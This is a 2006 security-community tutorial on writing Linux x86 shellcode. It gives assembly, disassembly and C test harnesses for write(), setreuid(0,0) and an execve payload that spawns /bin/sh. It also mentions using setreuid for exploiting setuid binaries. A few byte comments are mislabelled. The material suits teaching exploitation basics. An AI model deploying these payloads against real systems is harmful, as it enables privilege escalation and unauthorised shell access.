Gotfault Security Community (GSC) ---------[ Chapter : 0x900 ] ---------[ Subject : Basic Shellcode Writing ] ---------[ Author : dx A.K.A. Thyago Silva ] ---------[ Date : 04/02/2006 ] ---------[ Version : 1.0 ] |=--------------------------------------------------------------------------=| ---------[ Table of Contents ] 0x910 - Objective 0x920 - Requisites 0x930 - Introduction to Shellcode 0x940 - Linux System Calls 0x950 - X86 Registers 0x960 - Common Assembly Instructions 0x970 - write() 0x980 - setreuid() 0x990 - execve() 0x9a0 - Conclusion |=--------------------------------------------------------------------------=| ---------[ 0x910 - Objective ] This paper will show an introduction to write shellcode. ---------[ 0x920 - Requisites ] Basic knowledge of C, ASM and working with debuggers (gdb & objdump) are required. ---------[ 0x930 - Introduction to Shellcode ] Shellcode is machine code that when executed spawns a shell, sometimes. Shellcode cannot have any null's in it because it is treated as a C string and a null will stop the reading of the string. Not all "shellcode" spawns a shell, this has become a more generic name for a bit of position independant machine readable code that can be directly executed by the cpu. Shellcode execution can be triggered by overwriting a stack return address with the address of the injected shellcode. ---------[ 0x940 - Linux System Calls ] In addition to the raw assembly instructions found in the processor, Linux provides the programmer with a set of functions that can be easily executed from assembly. These are known as system calls, and they are triggered by using interrupts. A listing of enumerated system calls can be found in /usr/include/asm/unistd.h. Using the few assembly instructions and the system calls found in unistd.h, many different assembly programs and pieces of bytecode can be written to perform many different functions. ---------[ 0x950 - X86 Registers ] Registers are temporary storage locations used to hold data, instructions, or the results of calculations. They are actually memory areas stored on the cpu itself, used for extermely fast access to the values within them, this is because the cpu doesn't have to access a location outside of itself. Intel has 32 bit registers that can be split up in 16 and 8 bit. 32 Bit 16 Bit 8 Bit (High) 8 Bit (Low) ------------------------------------------- EAX AX AH AL EBX BX BH BL ECX CX CH CL EDX DX DH DL EAX, AX, AH and AL: * Are called as the "Accumulator" registers. EBX, BX, BH, and BL: * Are the "Base" registers. ECX, CX, CH, and CL: * Are also known as the "Counter" registers. EDX, DX, DH, and DL: * Are called the "Data" registers. When you want to execute a system call have to use these registers to prepare the system call. A very simple example is the exit(0): [xgc@knowledge:~/shellcode]$ more exit.s .section .text .global _start _start: mov $0x1, %al # syscall number for exit xorl %ebx, %ebx # zero out EBX register int $0x80 # changes to kernel mode Assemble. [xgc@knowledge:~/shellcode]$ as -o exit.o exit.s Link. [xgc@knowledge:~/shellcode]$ ld -o exit exit.o Disassemble. [xgc@knowledge:~/shellcode]$ strace ./exit execve("./exit", ["./exit"], [/* 18 vars */]) = 0 _exit(0) = ? [xgc@knowledge:~/shellcode]$ objdump -d exit exit: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: b0 01 mov $0x1,%al 8048076: 31 db xor %ebx,%ebx 8048078: cd 80 int $0x80 It is important to always use the smallest registers available to store your data in. This to avoid NULL bytes in shell code. For example if we would use the following exit code: [xgc@knowledge:~/shellcode]$ more exit.s .section .text .global _start _start: movl $0x1, %eax # syscall number for exit xorl %ebx, %ebx # zero out EBX register int $0x80 # changes to kernel mode Assemble. [xgc@knowledge:~/shellcode]$ as -o exit.o exit.s Link. [xgc@knowledge:~/shellcode]$ ld -o exit exit.o Disassemble. [xgc@knowledge:~/shellcode]$ strace ./exit execve("./exit", ["./exit"], [/* 18 vars */]) = 0 _exit(0) = ? The register 'eax' will be to large to hold our byte with the result that NULL bytes will exist in our shellcode result: [xgc@knowledge:~/shellcode]$ objdump -d exit exit: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: b8 01 00 00 00 mov $0x1,%eax 8048079: 31 db xor %ebx,%ebx 804807b: cd 80 int $0x80 ---------[ 0x960 - Common Assembly Instructions ] The following are some instructions that will be used in the construction of shellcode. ------------------------------------------------------------------------------------ Instruction Name/Syntax Description ------------------------------------------------------------------------------------ MOV move instruction/ Move the value from src into mov src, dest dest ------------------------------------------------------------------------------------ ADD Add instruction Used to add values add src, dest Add the value in src to dest ------------------------------------------------------------------------------------ SUB Subtract instruction Used to subtract values sub src, dest Subtract the value in src from dest ------------------------------------------------------------------------------------ PUSH Push instruction Used to push values to the stack push target Push the value in target to the stack ------------------------------------------------------------------------------------ POP Pop instruction Used to pop values from the stack pop target Pop a value from the stack into target ------------------------------------------------------------------------------------ JMP Jump instruction Used to change the EIP to a certain address jmp address Change the EIP to the address in address ------------------------------------------------------------------------------------ CALL Call instruction Used like a function call, to change the call address EIP to a certain address Push the address of the next instruction to the stack, and then change the EIP to the address in address. ------------------------------------------------------------------------------------ LEA Load effective address Used to get the address of a piece of memory lea src, dest Load the address of src into dest ------------------------------------------------------------------------------------ INT Interrupt Used to send a signal to the kernel int value Call interrupt of value ------------------------------------------------------------------------------------ ---------[ 0x970 - write() Example ] Now some shellcode to print a string. [xgc@knowledge:~/shellcode]$ man 2 write WRITE(2) Linux Programmer's Manual WRITE(2) NAME write - write to a file descriptor SYNOPSIS #include ssize_t write(int fd, const void *buf, size_t count); DESCRIPTION write writes up to count bytes to the file referenced by the file descriptor fd from the buffer starting at buf. POSIX requires that a read() which can be proved to occur after a write() has returned returns the new data. Note that not all file systems are POSIX con- forming. It takes the file descriptor as the first argument, which is an integer. The standard output device is 1, so to print to the terminal (STDOUT), this argument should be 1. The second argument is a pointer to a character buffer containing the string to be written. The final argument is the size of this character buffer. [xgc@knowledge:~/shellcode]$ grep __NR_write /usr/include/asm/unistd.h #define __NR_write 4 [xgc@knowledge:~/shellcode]$ grep __NR_exit /usr/include/asm/unistd.h #define __NR_exit 1 write(int fd, const void *buf, size_t count); --------------------------------------------- EAX EBX ECX EDX xorl %ebx, %ebx # zero out EBX register The value of 4 needs to be put into the EAX register, because the write() function is system call number 4. push $0x4 # pushes write syscall into the stack popl %eax # takes off 0x4 from stack to eax register The address of the string in the data segment needs to be put into ECX. All strings must have a NULL termination, as EBX = 0, then: pushl %ebx # pushes 0 into the stack pushl $0x0a0d4141 # pushes "\n\rAA" into the stack movl %esp, %ecx # moves stack's content to ecx register Then the value of 1 needs to be put into EBX, because the first argument of write() is an integer representing the file descriptor (in this case, it is the standard output device, which is 1). incl %ebx # increment EBX by 1 And finally, the length of this string (in this case, 04) needs to be put into EDX. push $0x4 # pushes 0x4 into the stack popl %edx # takes off 0x4 (len) to edx register After these registers are loaded, the system call interrupt is called, which will call the write() function. int $0x80 # changes to kernel mode To exit cleanly, the exit() function needs to be called, and it should take a single argument of 0. So the value of 1 needs to be put into EAX, because exit() is system call number 1. xorl %eax, %eax # zero out EAX register incl %eax # increment EAX by 1 And the value of 0 needs to be put into EBX, because the first and only argument should be 0. Then the system call interrupt should be called one last time. xorl %ebx, %ebx # zero out EBX register int $0x80 # changes to kernel mode So assemble, link, strace, execute and disassemble it. [xgc@knowledge:~/shellcode]$ as write.s -o write.o [xgc@knowledge:~/shellcode]$ ld write.o -o write [xgc@knowledge:~/shellcode]$ strace ./write execve("./hello", ["./hello"], [/* 18 vars */]) = 0 write(1, "AA\r\n", 4AA ) = 4 _exit(1) = ? [xgc@knowledge:~/shellcode]$ ./write AA [xgc@knowledge:~/shellcode]$ objdump -d ./write ./hello: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: 31 db xor %ebx,%ebx 8048076: 6a 04 push $0x4 8048078: 58 pop %eax 8048079: 53 push %ebx 804807a: 68 41 41 0d 0a push $0xa0d4141 804807f: 89 e1 mov %esp,%ecx 8048081: 43 inc %ebx 8048082: 6a 04 push $0x4 8048084: 5a pop %edx 8048085: cd 80 int $0x80 8048087: 31 c0 xor %eax,%eax 8048089: 31 db xor %ebx,%ebx 804808b: 40 inc %eax 804808c: cd 80 int $0x80 [xgc@knowledge:~/shellcode]$ Create the shellcode string from the disassembly and make a C string out of it, hex chars need a '\x' in front of them: I have: "\x31\xdb" // xor %ebx, %ebx "\x6a\x04" // push $0x4 "\x58" // pop %eax "\x53" // push %edx "\x68\x41\x41\x0d\x0a" // push $0x0a0d4141 "\x89\xe1" // mov %esp, %ecx "\x43" // inc %ebx "\x6a\x04" // push $0x4 "\x5a" // pop %edx "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax, %eax "\x31\xdb" // xor %ebx, %ebx "\x40" // inc %eax "\xcd\x80"; // int $0x80 Put it in a test file, compile and run it. [xgc@knowledge:~/shellcode]$ more write.c char shellcode[] = "\x31\xdb" // xor %ebx, %ebx "\x6a\x04" // push $0x4 "\x58" // pop %eax "\x53" // push %edx "\x68\x41\x41\x0d\x0a" // push $0x0a0d4141 "\x89\xe1" // mov %esp, %ecx "\x43" // inc %ebx "\x6a\x04" // push $0x4 "\x5a" // pop %edx "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax, %eax "\x31\xdb" // xor %ebx, %ebx "\x40" // inc %eax "\xcd\x80"; // int $0x80 int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); } [xgc@knowledge:~/shellcode]$ gcc -o write write.c [xgc@knowledge:~/shellcode]$ ./write Length: 26 AA [xgc@knowledge:~/shellcode]$ ---------[ 0x980 - setreuid() Example ] [xgc@knowledge:~/shellcode]$ man setreuid SETREUID(2) Linux Programmer's Manual SETREUID(2) NAME setreuid, setregid - set real and/or effective user or group ID SYNOPSIS #include #include int setreuid(uid_t ruid, uid_t euid); int setregid(gid_t rgid, gid_t egid); DESCRIPTION setreuid sets real and effective user IDs of the current process. Sometimes we may be in need of some "privilege restoration routines" which restore a given process' root privileges whenever they are processed by it but are temporarily unavailable because of some security reasons. These routines are especially useful for exploiting vulnerabilities in certain setuid binaries, the ones that revert but do not completely drop their elevated privileges. setreuid is one of them, and sets the process' real and effective user id's. [xgc@knowledge:~/shellcode]$ grep __NR_setreuid /usr/include/asm/unistd.h #define __NR_setreuid 70 We set EAX 0x46 which is sys_setreuid's value, push $0x46 # pushes setreuid syscall into the stack popl %eax # takes off 0x46 from stack to EAX register EBX to the real userid, xorl %ebx, %ebx # zero out EBX register and ECX to the effective userid. xorl %ecx, %ecx # zero out ECX register int $0x80 # changes to kernel mode To exit cleanly, the exit() function needs to be called, and it should take a single argument of 0. So the value of 1 needs to be put into EAX, because exit() is system call number 1. xorl %eax, %eax # zero out EAX register incl %eax # increment EAX by 1 And the value of 0 needs to be put into EBX, because the first and only argument should be 0. Then the system call interrupt should be called one last time. xorl %ebx, %ebx # zero out EBX register int $0x80 # changes to kernel mode So assemble, link, strace, execute and disassemble it. [xgc@knowledge:~/shellcode]$ as setreuid.s -o setreuid.o [xgc@knowledge:~/shellcode]$ ld setreuid.o -o setreuid [xgc@knowledge:~/shellcode]$ strace ./setreuid execve("./setreuid", ["./setreuid"], [/* 18 vars */]) = 0 setreuid(0, 0) = -1 EPERM (Operation not permitted) _exit(0) = ? [xgc@knowledge:~/shellcode]$ ./setreuid [xgc@knowledge:~/shellcode]$ objdump -d ./setreuid ./setreuid: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: 6a 46 push $0x46 8048076: 58 pop %eax 8048077: 31 db xor %ebx,%ebx 8048079: 31 c9 xor %ecx,%ecx 804807b: cd 80 int $0x80 804807d: 31 c0 xor %eax,%eax 804807f: 40 inc %eax 8048080: 31 db xor %ebx,%ebx 8048082: cd 80 int $0x80 [xgc@knowledge:~/shellcode]$ ---------[ 0x990 - execve() Example ] [xgc@knowledge:~/shellcode]$ man execve EXECVE(2) Linux Programmer's Manual EXECVE(2) NAME execve - execute program SYNOPSIS #include int execve(const char *filename, char *const argv [], char *const envp[]); This is the sweetest part. Basing what we've learned so far, lets try coding a shellcode which spawns an interactive shell. There's no need for an exit() function call, because an interactive program is being spawned. It's obvious that ECX has the address of argv[] and EDX has the address of env[]. They are pointers to character arrays. Environment variables can be set to NULL, which means we can have a zero in EDX, however, we need to supply argv[0] the name of the program at least. Since argv[] will be NULL terminated, argv[1] will be zero also. So we'll need to: * have the string "/bin/sh" somewhere in memory * write the address of that into EBX * create a char ** which holds the address of the former "/bin/sh" and the address of a NULL. * write the address of that char ** into ECX. * write zero into EDX. * changes to kernel mode First write a NULL terminated "/bin/sh" into memory. We can do this by pushing a NULL and an adjacent "/bin/sh" into stack: Create a NULL in EAX. This will be used for terminating the string: xorl %eax, %eax Push that zero (null) into stack: pushl %eax Push "//sh": pushl $0x68732f2f Push "/bin": pushl $0x6e69622f At this moment, ESP points at the starting address of "/bin//sh". We can safely write this into EBX: movl %esp, %ebx EAX is still zero. We can use this to terminate char **argv: pushl %eax If we push the address of "/bin//sh" into stack too, the address of the pointer to character array argv will be at ESP. In this way, we have created the char **argv in the memory: pushl %ebx And write the address of argv into ECX: movl %esp, %ecx EDX may happily be zero. xorl %edx, %edx sys_execve = 0xb. That should be in EAX: movb $0xb, %al Trigger the interrupt and enter kernel mode: int $0x80 So assemble, link, execute and disassemble it. [xgc@knowledge:~/shellcode]$ as execve.s -o execve.o [xgc@knowledge:~/shellcode]$ ld execve.o -o execve [xgc@knowledge:~/shellcode]$ ./execve sh-2.05b$ exit exit [xgc@knowledge:~/shellcode]$ objdump -d ./execve ./execve: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: 31 c0 xor %eax,%eax 8048076: 50 push %eax 8048077: 68 2f 2f 73 68 push $0x68732f2f 804807c: 68 2f 62 69 6e push $0x6e69622f 8048081: 89 e3 mov %esp,%ebx 8048083: 50 push %eax 8048084: 53 push %ebx 8048085: 89 e1 mov %esp,%ecx 8048087: 31 d2 xor %edx,%edx 8048089: b0 0b mov $0xb,%al 804808b: cd 80 int $0x80 [xgc@knowledge:~/shellcode]$ Create the shellcode string from the disassembly and make a C string out of it, hex chars need a '\x' in front of them: I have: "\x31\xc0" // xor %eax, %eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x50" // push %eax "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\x31\xd2" // mov %edx, %edx "\xb0\x0b" // mov $0xb, %al "\xcd\x80"; // int $0x80 Put it on a test file, compile and run: [xgc@knowledge:~/shellcode]$ more execve.c char shellcode[] = "\x31\xc0" // xor %eax, %eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x50" // push %eax "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\x31\xd2" // mov %edx, %edx "\xb0\x0b" // mov $0xb, %al "\xcd\x80"; // int $0x80 int main() { int (*f)() = (int(*)())shellcode; printf("Length: %u\n", strlen(shellcode)); f(); } [xgc@knowledge:~/shellcode]$ gcc -o execve execve.c [xgc@knowledge:~/shellcode]$ ./execve Length: 25 sh-2.05b$ ---------[ 0x9a0 - Conclusion ] Theres many ways to make shellcodes smaller, and with shellcode the smaller the better. Using the mentioned logic, anyone can construct millions of fantastic shellcodes. What is necessary is just a little bit attention.